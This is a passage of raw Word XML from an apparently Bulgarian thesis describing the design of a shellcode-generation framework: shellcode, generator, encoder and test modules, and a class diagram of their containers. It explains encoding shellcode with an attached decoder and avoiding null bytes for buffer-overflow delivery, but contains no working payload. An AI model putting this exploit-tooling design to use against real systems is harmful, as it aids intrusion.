        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Клас диаграма на клоните</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc3540803"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Модули</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Финалната реализация на модули надгражда идеята в първата итерация, като ги категоризира в три подгрупи:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C2774A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_bld72aehbn8a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="136"/>
      <w:r w:rsidRPr="00C2774A">
        <w:t>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Запазва особеностите си от първата итерация. Прилага се разделение между код и информация. Кодът представлява частта от шелкода, която се изпълнява. Информацията е много подобна на променливите от езиците за по-високо ниво. Разделението се налага, защото ако всеки модул позиционира информацията си веднага до него, ще са необходими допълнителни jmp инструкции, за да я прескочат. Това, освен че добавя излишен код, прави крайния шелкод по-разхвърлян и четенето му, което е е предизвикателна задача, би станало още по-трудно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C2774A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_71xxksw8wj7o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="137"/>
      <w:r w:rsidRPr="00C2774A">
        <w:t>Генератор</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Остава непроменен. Той се грижи за подредбата на шелкода и архитектурни специфики - неизпълнимият код да е преди или след изпълнимия </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>и да има скок към началото на програмата. Също така, за улесняване на процеса на дебъгване, трябва да дефинира всичката информация за успешно свързване (linking) на програмата, например символ _start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C2774A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_y7flg8g4z2ck" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="138"/>
      <w:r w:rsidRPr="00C2774A">
        <w:t>Енкодер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Енкодерът е модул, който кодира готов шелкод. Той приема готов байтов код, обработва го с избран алгоритъм и му прикача код за декодиране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C2774A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_6d0yyghc053a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="139"/>
      <w:r w:rsidRPr="00C2774A">
        <w:t>Тест</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Това е програма, която изпълнява шелкода в тестова среда, която обикновено представлява дадено ограничение. Например, ако шелкодът ще бъде доставян чрез препълване на буфер за символен низ, то той не трябва да съдържа нулеви байтове. Тестът гарантира коректно изпълнение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_vj10q1piy5w2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="141" w:name="_Toc3540804"/>
      <w:bookmarkEnd w:id="140"/>
      <w:r w:rsidRPr="008227E1">
        <w:lastRenderedPageBreak/>
        <w:t>Контейнери</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> (класове) за модули</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w:rsidR="00875CB1" w:rsidRDefault="005F56EB" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Модулите за шелкод, кодиране и тестване споделят голяма част от функционалността си, както е показано на</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F56EB" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref2190843 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6" w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |   Container    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |get_data()      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |get_code()      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |build_data()    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |build_code()    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |param_template()|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |inspect()       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       ^        ^       ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |        |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         +-------------+        |       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                      |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                      |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|   BaseModule   |      |  BaseEncoder   |      |    BaseTest    |       | BaseGenerator  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|__reprp__()     |      |build()         |      |build()         |       |append_module() |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      |prepare_build() |      +----------------+       |build()         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         ^              +----------------+               ^               |clear()         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       ^                       |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +---------------------+          |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|   ArchModule   |      |     ArchEncoder     |          |               |   Generator    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +---------------------+          |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|                |      |build()              |          |               |build()         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      |shellcode_transform()|          |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         ^              +---------------------+          |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       ^                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|     Module     |      |    Encoder     |      |      Test      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
